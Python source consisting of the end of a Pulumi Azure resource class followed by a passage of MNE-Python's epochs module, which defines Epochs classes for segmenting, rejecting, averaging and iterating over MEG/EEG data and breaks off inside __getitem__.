def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Tags are a list of key-value pairs that describe the resource. These tags can be used in viewing and grouping this resource (across resource groups). A maximum of 15 tags can be provided for a resource. Each tag must have a key no greater than 128 characters and value no greater than 256 characters. For example, the default experience for a template type is set with "defaultExperience": "Cassandra". Current "defaultExperience" values also include "Table", "Graph", "DocumentDB", and "MongoDB".
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
The type of Azure resource.
"""
return pulumi.get(self, "type")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
|
"""Tools for working with epoched data"""
# Authors: Alexandre Gramfort <gramfort@nmr.mgh.harvard.edu>
# Matti Hamalainen <msh@nmr.mgh.harvard.edu>
# Daniel Strohmeier <daniel.strohmeier@tu-ilmenau.de>
# Denis Engemann <d.engemann@fz-juelich.de>
# Mainak Jas <mainak@neuro.hut.fi>
#
# License: BSD (3-clause)
from .externals.six import string_types
import copy as cp
import warnings
import json
import numpy as np
from .fiff.write import (start_file, start_block, end_file, end_block,
write_int, write_float_matrix, write_float,
write_id, write_string)
from .fiff.meas_info import read_meas_info, write_meas_info
from .fiff.open import fiff_open
from .fiff.raw import _time_as_index, _index_as_time, Raw
from .fiff.tree import dir_tree_find
from .fiff.tag import read_tag
from .fiff import Evoked, FIFF
from .fiff.pick import (pick_types, channel_indices_by_type, channel_type,
pick_channels, pick_info)
from .fiff.proj import setup_proj, ProjMixin
from .fiff.channels import ContainsMixin, DropChannelsMixin
from .fiff.evoked import aspect_rev
from .baseline import rescale
from .utils import (check_random_state, _check_pandas_index_arguments,
_check_pandas_installed)
from .filter import resample, detrend
from .event import _read_events_fif
from .fixes import in1d
from .viz import _mutable_defaults, plot_epochs
from .utils import logger, verbose
from .externals import six
from .externals.six.moves import zip
from .utils import deprecated
class _BaseEpochs(ProjMixin, ContainsMixin, DropChannelsMixin):
"""Abstract base class for Epochs-type classes
This class provides basic functionality and should never be instantiated
directly. See Epochs below for an explanation of the parameters.
"""
def __init__(self, info, event_id, tmin, tmax, baseline=(None, 0),
picks=None, name='Unknown', reject=None, flat=None,
decim=1, reject_tmin=None, reject_tmax=None, detrend=None,
add_eeg_ref=True, verbose=None):
self.verbose = verbose
self.name = name
if isinstance(event_id, dict):
if not all([isinstance(v, int) for v in event_id.values()]):
raise ValueError('Event IDs must be of type integer')
if not all([isinstance(k, string_types) for k in event_id]):
raise ValueError('Event names must be of type str')
self.event_id = event_id
elif isinstance(event_id, list):
if not all([isinstance(v, int) for v in event_id]):
raise ValueError('Event IDs must be of type integer')
self.event_id = dict(zip((str(i) for i in event_id), event_id))
elif isinstance(event_id, int):
self.event_id = {str(event_id): event_id}
else:
raise ValueError('event_id must be dict or int.')
# check reject_tmin and reject_tmax
if (reject_tmin is not None) and (reject_tmin < tmin):
raise ValueError("reject_tmin needs to be None or >= tmin")
if (reject_tmax is not None) and (reject_tmax > tmax):
raise ValueError("reject_tmax needs to be None or <= tmax")
if (reject_tmin is not None) and (reject_tmax is not None):
if reject_tmin >= reject_tmax:
raise ValueError('reject_tmin needs to be < reject_tmax')
if detrend not in [None, 0, 1]:
raise ValueError('detrend must be None, 0, or 1')
# check that baseline is in available data
if baseline is not None:
baseline_tmin, baseline_tmax = baseline
tstep = 1. / info['sfreq']
if baseline_tmin is not None:
if baseline_tmin < tmin - tstep:
err = ("Baseline interval (tmin = %s) is outside of epoch "
"data (tmin = %s)" % (baseline_tmin, tmin))
raise ValueError(err)
if baseline_tmax is not None:
if baseline_tmax > tmax + tstep:
err = ("Baseline interval (tmax = %s) is outside of epoch "
"data (tmax = %s)" % (baseline_tmax, tmax))
raise ValueError(err)
self.tmin = tmin
self.tmax = tmax
self.baseline = baseline
self.reject = reject
self.reject_tmin = reject_tmin
self.reject_tmax = reject_tmax
self.flat = flat
self.decim = decim = int(decim)
self._bad_dropped = False
self.drop_log = None
self.selection = None
self.detrend = detrend
# Handle measurement info
self.info = info
if picks is None:
picks = list(range(len(self.info['ch_names'])))
else:
self.info['chs'] = [self.info['chs'][k] for k in picks]
self.info['ch_names'] = [self.info['ch_names'][k] for k in picks]
self.info['nchan'] = len(picks)
self.picks = picks
if len(picks) == 0:
raise ValueError("Picks cannot be empty.")
# Handle times
if tmin >= tmax:
raise ValueError('tmin has to be smaller than tmax')
sfreq = float(self.info['sfreq'])
n_times_min = int(round(tmin * sfreq))
n_times_max = int(round(tmax * sfreq))
times = np.arange(n_times_min, n_times_max + 1, dtype=np.float) / sfreq
self.times = times
self._raw_times = times # times before decimation
self._epoch_stop = ep_len = len(self.times)
if decim > 1:
new_sfreq = sfreq / decim
lowpass = self.info['lowpass']
if new_sfreq < 2.5 * lowpass: # nyquist says 2 but 2.5 is safer
msg = ('The measurement information indicates a low-pass '
'frequency of %g Hz. The decim=%i parameter will '
'result in a sampling frequency of %g Hz, which can '
'cause aliasing artifacts.'
% (lowpass, decim, new_sfreq))
warnings.warn(msg)
i_start = n_times_min % decim
self._decim_idx = slice(i_start, ep_len, decim)
self.times = self.times[self._decim_idx]
self.info['sfreq'] = new_sfreq
self.preload = False
self._data = None
self._offset = None
# setup epoch rejection
self._reject_setup()
def _reject_setup(self):
"""Sets self._reject_time and self._channel_type_idx (called from
__init__)
"""
if self.reject is None and self.flat is None:
return
idx = channel_indices_by_type(self.info)
for key in idx.keys():
if (self.reject is not None and key in self.reject) \
or (self.flat is not None and key in self.flat):
if len(idx[key]) == 0:
raise ValueError("No %s channel found. Cannot reject based"
" on %s." % (key.upper(), key.upper()))
self._channel_type_idx = idx
if (self.reject_tmin is None) and (self.reject_tmax is None):
self._reject_time = None
else:
if self.reject_tmin is None:
reject_imin = None
else:
idxs = np.nonzero(self.times >= self.reject_tmin)[0]
reject_imin = idxs[0]
if self.reject_tmax is None:
reject_imax = None
else:
idxs = np.nonzero(self.times <= self.reject_tmax)[0]
reject_imax = idxs[-1]
self._reject_time = slice(reject_imin, reject_imax)
@verbose
def _is_good_epoch(self, data, verbose=None):
"""Determine if epoch is good"""
if data is None:
return False, ['NO_DATA']
n_times = len(self.times)
if data.shape[1] < n_times:
# epoch is too short, i.e. at the end of the data
return False, ['TOO_SHORT']
if self.reject is None and self.flat is None:
return True, None
else:
if self._reject_time is not None:
data = data[:, self._reject_time]
return _is_good(data, self.ch_names, self._channel_type_idx,
self.reject, self.flat, full_report=True,
ignore_chs=self.info['bads'])
def get_data(self):
"""Get all epochs as a 3D array
Returns
-------
data : array of shape [n_epochs, n_channels, n_times]
The epochs data
"""
if self.preload:
return self._data
else:
data = self._get_data_from_disk()
return data
def iter_evoked(self):
"""Iterate over Evoked objects with nave=1
"""
self._current = 0
while True:
evoked = Evoked(None)
evoked.info = cp.deepcopy(self.info)
evoked.times = self.times.copy()
evoked.nave = 1
evoked.first = int(self.times[0] * self.info['sfreq'])
evoked.last = evoked.first + len(self.times) - 1
evoked.data, event_id = self.next(True)
evoked.comment = str(event_id)
yield evoked
def subtract_evoked(self, evoked=None):
"""Subtract an evoked response from each epoch
Can be used to exclude the evoked response when analyzing induced
activity, see e.g. [1].
References
----------
[1] David et al. "Mechanisms of evoked and induced responses in
MEG/EEG", NeuroImage, vol. 31, no. 4, pp. 1580-1591, July 2006.
Parameters
----------
evoked : instance of mne.fiff.Evoked | None
The evoked response to subtract. If None, the evoked response
is computed from Epochs itself.
Returns
-------
self : instance of mne.Epochs
The modified instance (instance is also modified inplace).
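Examples
--------
A minimal sketch (``epochs`` is assumed to be an existing Epochs
instance; with no argument the evoked response is computed from the
epochs themselves)::

    epochs.subtract_evoked()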
"""
logger.info('Subtracting Evoked from Epochs')
if evoked is None:
picks = pick_types(self.info, meg=True, eeg=True,
stim=False, eog=False, ecg=False,
emg=False, exclude=[])
evoked = self.average(picks)
# find the indices of the channels to use
picks = pick_channels(evoked.ch_names, include=self.ch_names)
# make sure the omitted channels are not data channels
if len(picks) < len(self.ch_names):
sel_ch = [evoked.ch_names[ii] for ii in picks]
diff_ch = list(set(self.ch_names).difference(sel_ch))
diff_idx = [self.ch_names.index(ch) for ch in diff_ch]
diff_types = [channel_type(self.info, idx) for idx in diff_idx]
bad_idx = [diff_types.index(t) for t in diff_types if t in
['grad', 'mag', 'eeg']]
if len(bad_idx) > 0:
bad_str = ', '.join([diff_ch[ii] for ii in bad_idx])
raise ValueError('The following data channels are missing '
'in the evoked response: %s' % bad_str)
logger.info(' The following channels are not included in the '
'subtraction: %s' % ', '.join(diff_ch))
# make sure the times match
if (len(self.times) != len(evoked.times) or
np.max(np.abs(self.times - evoked.times)) >= 1e-7):
raise ValueError('Epochs and Evoked object do not contain '
'the same time points.')
# handle SSPs
if not self.proj and evoked.proj:
warnings.warn('Evoked has SSP applied while Epochs has not.')
if self.proj and not evoked.proj:
evoked = evoked.copy().apply_proj()
# find the indices of the channels to use in Epochs
ep_picks = [self.ch_names.index(evoked.ch_names[ii]) for ii in picks]
# do the subtraction
if self.preload:
self._data[:, ep_picks, :] -= evoked.data[picks][None, :, :]
else:
if self._offset is None:
self._offset = np.zeros((len(self.ch_names), len(self.times)),
dtype=np.float)
self._offset[ep_picks] -= evoked.data[picks]
logger.info('[done]')
return self
def _get_data_from_disk(self, out=True, verbose=None):
raise NotImplementedError('_get_data_from_disk() must be implemented '
'in derived class.')
def __iter__(self):
"""To make iteration over epochs easy.
"""
self._current = 0
return self
def next(self, return_event_id=False):
raise NotImplementedError('next() must be implemented in derived '
'class.')
def __next__(self, *args, **kwargs):
"""Wrapper for Py3k"""
return self.next(*args, **kwargs)
def average(self, picks=None):
"""Compute average of epochs
Parameters
----------
picks : None | array of int
If None, only MEG and EEG channels are kept;
otherwise the channel indices in picks are kept.
Returns
-------
evoked : Evoked instance
The averaged epochs
"""
return self._compute_mean_or_stderr(picks, 'ave')
def standard_error(self, picks=None):
"""Compute standard error over epochs
Parameters
----------
picks : None | array of int
If None, only MEG and EEG channels are kept;
otherwise the channel indices in picks are kept.
Returns
-------
evoked : Evoked instance
The standard error over epochs
"""
return self._compute_mean_or_stderr(picks, 'stderr')
def _compute_mean_or_stderr(self, picks, mode='ave'):
"""Compute the mean or std over epochs and return Evoked"""
_do_std = True if mode == 'stderr' else False
evoked = Evoked(None)
evoked.info = cp.deepcopy(self.info)
# make sure projs are really copied.
evoked.info['projs'] = [cp.deepcopy(p) for p in self.info['projs']]
n_channels = len(self.ch_names)
n_times = len(self.times)
if self.preload:
n_events = len(self.events)
if not _do_std:
data = np.mean(self._data, axis=0)
else:
data = np.std(self._data, axis=0)
assert len(self.events) == len(self._data)
else:
data = np.zeros((n_channels, n_times))
n_events = 0
for e in self:
data += e
n_events += 1
if n_events > 0:
data /= n_events
else:
data.fill(np.nan)
# convert to stderr if requested, could do in one pass but do in
# two (slower) in case there are large numbers
if _do_std:
data_mean = cp.copy(data)
data.fill(0.)
for e in self:
data += (e - data_mean) ** 2
data = np.sqrt(data / n_events)
evoked.data = data
evoked.times = self.times.copy()
evoked.comment = self.name
evoked.nave = n_events
evoked.first = int(self.times[0] * self.info['sfreq'])
evoked.last = evoked.first + len(self.times) - 1
if not _do_std:
evoked._aspect_kind = FIFF.FIFFV_ASPECT_AVERAGE
else:
evoked._aspect_kind = FIFF.FIFFV_ASPECT_STD_ERR
evoked.data /= np.sqrt(evoked.nave)
evoked.kind = aspect_rev.get(str(evoked._aspect_kind), 'Unknown')
# dropping EOG, ECG and STIM channels. Keeping only data
if picks is None:
picks = pick_types(evoked.info, meg=True, eeg=True, ref_meg=True,
stim=False, eog=False, ecg=False,
emg=False, exclude=[])
if len(picks) == 0:
raise ValueError('No data channel found when averaging.')
picks = np.sort(picks) # make sure channel order does not change
evoked.info['chs'] = [evoked.info['chs'][k] for k in picks]
evoked.info['ch_names'] = [evoked.info['ch_names'][k]
for k in picks]
evoked.info['nchan'] = len(picks)
evoked.data = evoked.data[picks]
# otherwise the apply_proj will be confused
evoked.proj = True if self.proj is True else None
evoked.verbose = self.verbose
if evoked.nave < 1:
warnings.warn('evoked object is empty (based on less '
'than 1 epoch)', RuntimeWarning)
return evoked
@property
def ch_names(self):
return self.info['ch_names']
def plot(self, epoch_idx=None, picks=None, scalings=None,
title_str='#%003i', show=True, block=False):
""" Visualize single trials using Trellis plot.
Parameters
----------
epoch_idx : array-like | int | None
The epochs to visualize. If None, the first 20 epochs are shown.
Defaults to None.
picks : array-like | None
Channels to be included. If None only good data channels are used.
Defaults to None
scalings : dict | None
Scale factors for the traces. If None, defaults to:
`dict(mag=1e-12, grad=4e-11, eeg=20e-6, eog=150e-6, ecg=5e-4,
emg=1e-3, ref_meg=1e-12, misc=1e-3, stim=1, resp=1,
chpi=1e-4)`
title_str : None | str
The string formatting to use for axes titles. If None, no titles
will be shown. Defaults expand to ``#001, #002, ...``
show : bool
Whether to show the figure or not.
block : bool
Whether to halt program execution until the figure is closed.
Useful for rejecting bad trials on the fly by clicking on a
sub plot.
Returns
-------
fig : Instance of matplotlib.figure.Figure
The figure.
"""
return plot_epochs(self, epoch_idx=epoch_idx, picks=picks,
scalings=scalings, title_str=title_str,
show=show, block=block)
class Epochs(_BaseEpochs):
"""List of Epochs
Parameters
----------
raw : Raw object
An instance of Raw.
events : array of shape [n_events, 3]
The events typically returned by the read_events function.
If some events don't match the events of interest as specified
by event_id, they will be marked as 'IGNORED' in the drop log.
event_id : int | list of int | dict | None
The id of the event to consider. If dict,
the keys can later be used to access associated events. Example:
dict(auditory=1, visual=3). If int, a dict will be created with
the id as string. If a list, all events with the IDs specified
in the list are used. If None, all events will be used,
and a dict is created with string integer names corresponding
to the event id integers.
tmin : float
Start time before event.
tmax : float
End time after event.
name : string
Comment that describes the Evoked data created.
baseline : None or tuple of length 2 (default (None, 0))
The time interval to apply baseline correction.
If None do not apply it. If baseline is (a, b)
the interval is between "a (s)" and "b (s)".
If a is None the beginning of the data is used
and if b is None then b is set to the end of the interval.
If baseline is equal to (None, None) all the time
interval is used.
The baseline (a, b) includes both endpoints, i.e. all
timepoints t such that a <= t <= b.
picks : None (default) or array of int
Indices of channels to include (if None, all channels
are used).
preload : boolean
Load all epochs from disk when creating the object
or wait before accessing each epoch (more memory
efficient but can be slower).
reject : dict
Epoch rejection parameters based on peak to peak amplitude.
Valid keys are 'grad' | 'mag' | 'eeg' | 'eog' | 'ecg'.
If reject is None then no rejection is done.
Values are float. Example::
reject = dict(grad=4000e-13, # T / m (gradiometers)
mag=4e-12, # T (magnetometers)
eeg=40e-6, # uV (EEG channels)
eog=250e-6 # uV (EOG channels)
)
flat : dict
Epoch rejection parameters based on flatness of signal
Valid keys are 'grad' | 'mag' | 'eeg' | 'eog' | 'ecg'
If flat is None then no rejection is done.
proj : bool | 'delayed'
Apply SSP projection vectors. If proj is 'delayed' and reject is not
None the single epochs will be projected before the rejection
decision, but used in unprojected state if they are kept.
This way deciding which projection vectors are good can be postponed
to the evoked stage without resulting in lower epoch counts and
without producing results different from early SSP application
given comparable parameters. Note that in this case baselining,
detrending and temporal decimation will be postponed.
If proj is False no projections will be applied which is the
recommended value if SSPs are not used for cleaning the data.
decim : int
Factor by which to downsample the data from the raw file upon import.
Warning: This simply selects every nth sample; data is not filtered
here. If data is not properly filtered, aliasing artifacts may occur.
reject_tmin : scalar | None
Start of the time window used to reject epochs (with the default None,
the window will start with tmin).
reject_tmax : scalar | None
End of the time window used to reject epochs (with the default None,
the window will end with tmax).
detrend : int | None
If 0 or 1, the data channels (MEG and EEG) will be detrended when
loaded. 0 is a constant (DC) detrend, 1 is a linear detrend. None
is no detrending. Note that detrending is performed before baseline
correction. If no DC offset is preferred (zeroth order detrending),
either turn off baseline correction, as this may introduce a DC
shift, or set baseline correction to use the entire time interval
(will yield equivalent results but be slower).
add_eeg_ref : bool
If True, an EEG average reference will be added (unless one
already exists).
on_missing : str
What to do if an event id is not found in the recording.
Valid keys are 'error' | 'warning' | 'ignore'
Default is 'error'. If on_missing is 'warning' it will proceed but
warn, if 'ignore' it will proceed silently.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Defaults to raw.verbose.
Attributes
----------
info: dict
Measurement info.
event_id : dict
Names of conditions corresponding to event_ids.
ch_names : list of string
List of channels' names.
selection : array
List of indices of selected events (not dropped or ignored etc.). For
example, if the original event array had 4 events and the second event
has been dropped, this attribute would be np.array([0, 2, 3]).
drop_log : list of lists
A list of the same length as the event array used to initialize the
Epochs object. If the i-th original event is still part of the
selection, drop_log[i] will be an empty list; otherwise it will be
a list of the reasons the event is no longer in the selection, e.g.:
'IGNORED' if it isn't part of the current subset defined by the user;
'NO_DATA' or 'TOO_SHORT' if epoch didn't contain enough data;
names of channels that exceeded the amplitude threshold;
'EQUALIZED_COUNTS' (see equalize_event_counts);
or user-defined reasons (see drop_epochs).
verbose : bool, str, int, or None
See above.
Notes
-----
For indexing and slicing:
epochs[idx] : Epochs
Return Epochs object with a subset of epochs (supports single
index and python-style slicing)
For subset selection using categorical labels:
epochs['name'] : Epochs
Return Epochs object with a subset of epochs corresponding to an
experimental condition as specified by 'name'.
epochs[['name_1', 'name_2', ... ]] : Epochs
Return Epochs object with a subset of epochs corresponding to multiple
experimental conditions as specified by 'name_1', 'name_2', ... .
See also
--------
mne.epochs.combine_event_ids
mne.Epochs.equalize_event_counts
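Examples
--------
A minimal usage sketch (``raw`` and ``events`` are assumed to already
exist; the condition names are illustrative)::

    epochs = Epochs(raw, events, event_id=dict(auditory=1, visual=3),
                    tmin=-0.2, tmax=0.5, baseline=(None, 0), preload=True)
    evoked = epochs['auditory'].average()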
"""
@verbose
def __init__(self, raw, events, event_id, tmin, tmax, baseline=(None, 0),
picks=None, name='Unknown', preload=False, reject=None,
flat=None, proj=True, decim=1, reject_tmin=None,
reject_tmax=None, detrend=None, add_eeg_ref=True,
on_missing='error', verbose=None):
if raw is None:
return
elif not isinstance(raw, Raw):
raise ValueError('The first argument to `Epochs` must be `None` '
'or an instance of `mne.fiff.Raw`')
if on_missing not in ['error', 'warning', 'ignore']:
raise ValueError('on_missing must be one of: error, '
'warning, ignore. Got: %s' % on_missing)
# prepare for calling the base constructor
# Handle measurement info
info = cp.deepcopy(raw.info)
# make sure projs are really copied.
info['projs'] = [cp.deepcopy(p) for p in info['projs']]
if event_id is None: # convert to int to make typing-checks happy
event_id = dict((str(e), int(e)) for e in np.unique(events[:, 2]))
proj = proj or raw.proj # proj is on when applied in Raw
# call _BaseEpochs constructor
super(Epochs, self).__init__(info, event_id, tmin, tmax,
baseline=baseline, picks=picks, name=name,
reject=reject, flat=flat, decim=decim,
reject_tmin=reject_tmin,
reject_tmax=reject_tmax, detrend=detrend,
add_eeg_ref=add_eeg_ref, verbose=verbose)
# do the rest
self.raw = raw
proj = proj or raw.proj # proj is on when applied in Raw
if proj not in [True, 'delayed', False]:
raise ValueError(r"'proj' must either be 'True', 'False' or "
"'delayed'")
self.proj = proj
if self._check_delayed():
logger.info('Entering delayed SSP mode.')
activate = False if self._check_delayed() else self.proj
self._projector, self.info = setup_proj(self.info, add_eeg_ref,
activate=activate)
for key, val in self.event_id.items():
if val not in events[:, 2]:
msg = ('No matching events found for %s '
'(event id %i)' % (key, val))
if on_missing == 'error':
raise ValueError(msg)
elif on_missing == 'warning':
logger.warn(msg)
warnings.warn(msg)
else: # on_missing == 'ignore':
pass
# Select the desired events
values = list(self.event_id.values())
selected = in1d(events[:, 2], values)
self.events = events[selected]
n_events = len(self.events)
if n_events > 1:
if np.diff(self.events.astype(np.int64)[:, 0]).min() <= 0:
warnings.warn('The events passed to the Epochs constructor '
'are not chronologically ordered.',
RuntimeWarning)
if n_events > 0:
logger.info('%d matching events found' % n_events)
else:
raise ValueError('No desired events found.')
self.selection = np.where(selected)[0]
self.drop_log = []
for k in range(len(events)):
if events[k, 2] in values:
self.drop_log.append([])
else:
self.drop_log.append(['IGNORED'])
self.preload = preload
if self.preload:
self._data = self._get_data_from_disk()
self.raw = None
else:
self._data = None
@deprecated('drop_picks will be removed in v0.9. Use drop_channels.')
def drop_picks(self, bad_picks):
"""Drop some picks
Allows to discard some channels.
"""
self.picks = list(self.picks)
idx = [k for k, p in enumerate(self.picks) if p not in bad_picks]
self.picks = [self.picks[k] for k in idx]
self.info = pick_info(self.info, idx, copy=False)
if self._projector is not None:
self._projector = self._projector[idx][:, idx]
if self.preload:
self._data = self._data[:, idx, :]
def drop_bad_epochs(self):
"""Drop bad epochs without retaining the epochs data.
Should be used before slicing operations.
.. Warning:: Operation is slow since all epochs have to be read from
disk. To avoid reading epochs from disk multiple times, initialize
Epochs object with preload=True.
"""
self._get_data_from_disk(out=False)
def plot_drop_log(self, threshold=0, n_max_plot=20, subject='Unknown',
color=(0.9, 0.9, 0.9), width=0.8, ignore=['IGNORED']):
"""Show the channel stats based on a drop_log from Epochs
Parameters
----------
threshold : float
The percentage threshold to use to decide whether or not to
plot. Default is zero (always plot).
n_max_plot : int
Maximum number of channels to show stats for.
subject : str
The subject name to use in the title of the plot.
color : tuple | str
Color to use for the bars.
width : float
Width of the bars.
ignore : list
The drop reasons to ignore.
Returns
-------
perc : float
Total percentage of epochs dropped.
"""
if not self._bad_dropped:
print("Bad epochs have not yet been dropped.")
return
from .viz import plot_drop_log
return plot_drop_log(self.drop_log, threshold, n_max_plot, subject,
color=color, width=width, ignore=ignore)
def _check_delayed(self):
""" Aux method
"""
is_delayed = False
if self.proj == 'delayed':
if self.reject is None:
raise RuntimeError('The delayed SSP mode was requested '
'but no rejection parameters are present. '
'Please add rejection parameters before '
'using this option.')
is_delayed = True
return is_delayed
@verbose
def drop_epochs(self, indices, reason='USER', verbose=None):
"""Drop epochs based on indices or boolean mask
Note that the indices refer to the current set of undropped epochs
rather than the complete set of dropped and undropped epochs.
They are therefore not necessarily consistent with any external indices
(e.g., behavioral logs). To drop epochs based on external criteria,
do not use the preload=True flag when constructing an Epochs object,
and call this method before calling the drop_bad_epochs method.
Parameters
----------
indices : array of ints or bools
Set epochs to remove by specifying indices to remove or a boolean
mask to apply (where True values get removed). Events are
correspondingly modified.
reason : str
Reason for dropping the epochs ('ECG', 'timeout', 'blink' etc).
Default: 'USER'.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Defaults to raw.verbose.
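Examples
--------
A small sketch (``epochs`` is assumed to be an existing, preloaded
Epochs instance)::

    epochs.drop_epochs([0, 3], reason='blink')    # drop by index
    epochs.drop_epochs(epochs.events[:, 2] == 2)  # drop by boolean mask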
"""
indices = np.atleast_1d(indices)
if indices.ndim > 1:
raise ValueError("indices must be a scalar or a 1-d array")
if indices.dtype == bool:
indices = np.where(indices)[0]
out_of_bounds = (indices < 0) | (indices >= len(self.events))
if out_of_bounds.any():
first = indices[out_of_bounds][0]
raise IndexError("Epoch index %d is out of bounds" % first)
for ii in indices:
self.drop_log[self.selection[ii]].append(reason)
self.selection = np.delete(self.selection, indices)
self.events = np.delete(self.events, indices, axis=0)
if self.preload:
self._data = np.delete(self._data, indices, axis=0)
count = len(indices)
logger.info('Dropped %d epoch%s' % (count, '' if count == 1 else 's'))
@verbose
def _get_epoch_from_disk(self, idx, proj, verbose=None):
"""Load one epoch from disk"""
if self.raw is None:
# This should never happen, as raw=None only if preload=True
raise ValueError('An error has occurred, no valid raw file found.'
' Please report this to the mne-python '
'developers.')
sfreq = self.raw.info['sfreq']
if self.events.ndim == 1:
# single event
event_samp = self.events[0]
else:
event_samp = self.events[idx, 0]
# Read a data segment
first_samp = self.raw.first_samp
start = int(round(event_samp + self.tmin * sfreq)) - first_samp
stop = start + self._epoch_stop
if start < 0:
return None, None
epoch_raw, _ = self.raw[self.picks, start:stop]
# setup list of epochs to handle delayed SSP
epochs = []
# whenever requested, the first epoch is being projected.
if self._projector is not None and proj is True:
epochs += [np.dot(self._projector, epoch_raw)]
else:
epochs += [epoch_raw]
# in case the proj passed is True but self proj is not we
# have delayed SSP
if self.proj != proj: # so append another unprojected epoch
epochs += [epoch_raw.copy()]
# only preprocess the first candidate; to make delayed SSP work
# we need to postpone the preprocessing since projection comes
# first.
epochs[0] = self._preprocess(epochs[0], verbose)
# return a second None if nothing is projected
if len(epochs) == 1:
epochs += [None]
return epochs
@verbose
def _preprocess(self, epoch, verbose=None):
""" Aux Function
"""
if self.detrend is not None:
picks = pick_types(self.info, meg=True, eeg=True, stim=False,
ref_meg=False, eog=False, ecg=False,
emg=False, exclude=[])
epoch[picks] = detrend(epoch[picks], self.detrend, axis=1)
# Baseline correct
epoch = rescale(epoch, self._raw_times, self.baseline, 'mean',
copy=False, verbose=verbose)
# handle offset
if self._offset is not None:
epoch += self._offset
# Decimate
if self.decim > 1:
epoch = epoch[:, self._decim_idx]
return epoch
@verbose
def _get_data_from_disk(self, out=True, verbose=None):
"""Load all data from disk
Parameters
----------
out : bool
Return the data. Setting this to False is used to reject bad
epochs without caching all the data, which saves memory.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Defaults to self.verbose.
"""
n_events = len(self.events)
data = np.array([])
if self._bad_dropped:
proj = False if self._check_delayed() else self.proj
if not out:
return
for ii in range(n_events):
# faster to pre-allocate memory here
epoch, epoch_raw = self._get_epoch_from_disk(ii, proj=proj)
if ii == 0:
data = np.empty((n_events, epoch.shape[0],
epoch.shape[1]), dtype=epoch.dtype)
if self._check_delayed():
epoch = epoch_raw
data[ii] = epoch
else:
proj = True if self._check_delayed() else self.proj
good_events = []
n_out = 0
for idx, sel in zip(range(n_events), self.selection):
epoch, epoch_raw = self._get_epoch_from_disk(idx, proj=proj)
is_good, offenders = self._is_good_epoch(epoch)
if is_good:
good_events.append(idx)
if self._check_delayed():
epoch = epoch_raw
if out:
# faster to pre-allocate, then trim as necessary
if n_out == 0:
data = np.empty((n_events, epoch.shape[0],
epoch.shape[1]),
dtype=epoch.dtype, order='C')
data[n_out] = epoch
n_out += 1
else:
self.drop_log[sel] += offenders
self.selection = self.selection[good_events]
self.events = np.atleast_2d(self.events[good_events])
self._bad_dropped = True
logger.info("%d bad epochs dropped"
% (n_events - len(good_events)))
if not out:
return
# just take the good events
assert len(good_events) == n_out
if n_out > 0:
# slicing won't free the space, so we resize
# we have ensured the C-contiguity of the array in allocation
# so this operation will be safe unless np is very broken
data.resize((n_out,) + data.shape[1:], refcheck=False)
return data
@verbose
def _is_good_epoch(self, data, verbose=None):
"""Determine if epoch is good"""
if data is None:
return False, ['NO_DATA']
n_times = len(self.times)
if data.shape[1] < n_times:
# epoch is too short, i.e. at the end of the data
return False, ['TOO_SHORT']
if self.reject is None and self.flat is None:
return True, None
else:
if self._reject_time is not None:
data = data[:, self._reject_time]
return _is_good(data, self.ch_names, self._channel_type_idx,
self.reject, self.flat, full_report=True,
ignore_chs=self.info['bads'])
def get_data(self):
"""Get all epochs as a 3D array
Returns
-------
data : array of shape [n_epochs, n_channels, n_times]
The epochs data
"""
if self.preload:
data_ = self._data
else:
data_ = self._get_data_from_disk()
if self._check_delayed():
data = np.zeros_like(data_)
for ii, e in enumerate(data_):
data[ii] = self._preprocess(e.copy(), self.verbose)
else:
data = data_
return data
def _reject_setup(self):
"""Sets self._reject_time and self._channel_type_idx (called from
__init__)
"""
if self.reject is None and self.flat is None:
return
idx = channel_indices_by_type(self.info)
for key in idx.keys():
if (self.reject is not None and key in self.reject) \
or (self.flat is not None and key in self.flat):
if len(idx[key]) == 0:
raise ValueError("No %s channel found. Cannot reject based"
" on %s." % (key.upper(), key.upper()))
self._channel_type_idx = idx
if (self.reject_tmin is None) and (self.reject_tmax is None):
self._reject_time = None
else:
if self.reject_tmin is None:
reject_imin = None
else:
idxs = np.nonzero(self.times >= self.reject_tmin)[0]
reject_imin = idxs[0]
if self.reject_tmax is None:
reject_imax = None
else:
idxs = np.nonzero(self.times <= self.reject_tmax)[0]
reject_imax = idxs[-1]
self._reject_time = slice(reject_imin, reject_imax)
def __len__(self):
"""Number of epochs.
"""
if not self._bad_dropped:
err = ("Since bad epochs have not been dropped, the length of the "
"Epochs is not known. Load the Epochs with preload=True, "
"or call Epochs.drop_bad_epochs(). To find the number of "
"events in the Epochs, use len(Epochs.events).")
raise RuntimeError(err)
return len(self.events)
def __iter__(self):
"""To make iteration over epochs easy.
"""
self._current = 0
return self
def next(self, return_event_id=False):
"""To make iteration over epochs easy.
"""
if self.preload:
if self._current >= len(self._data):
raise StopIteration
epoch = self._data[self._current]
if self._check_delayed():
epoch = self._preprocess(epoch.copy())
self._current += 1
else:
proj = True if self._check_delayed() else self.proj
is_good = False
while not is_good:
if self._current >= len(self.events):
raise StopIteration
epoch, epoch_raw = self._get_epoch_from_disk(self._current,
proj=proj)
self._current += 1
is_good, _ = self._is_good_epoch(epoch)
# If delayed-ssp mode, pass 'virgin' data after rejection decision.
if self._check_delayed():
epoch = self._preprocess(epoch_raw)
if not return_event_id:
return epoch
else:
return epoch, self.events[self._current - 1][-1]
def __repr__(self):
""" Build string representation
"""
if not self._bad_dropped:
s = 'n_events : %s (good & bad)' % len(self.events)
else:
s = 'n_events : %s (all good)' % len(self.events)
s += ', tmin : %s (s)' % self.tmin
s += ', tmax : %s (s)' % self.tmax
s += ', baseline : %s' % str(self.baseline)
if len(self.event_id) > 1:
counts = ['%r: %i' % (k, sum(self.events[:, 2] == v))
for k, v in sorted(self.event_id.items())]
s += ',\n %s' % ', '.join(counts)
return '<Epochs | %s>' % s
def _key_match(self, key):
"""Helper function for event dict use"""
if key not in self.event_id:
raise KeyError('Event "%s" is not in Epochs.' % key)
return self.events[:, 2] == self.event_id[key]
def __getitem__(self, key):
"""Return an Epochs object with a subset of epochs
"""
data = self._data
del self._data
epochs = self.copy()
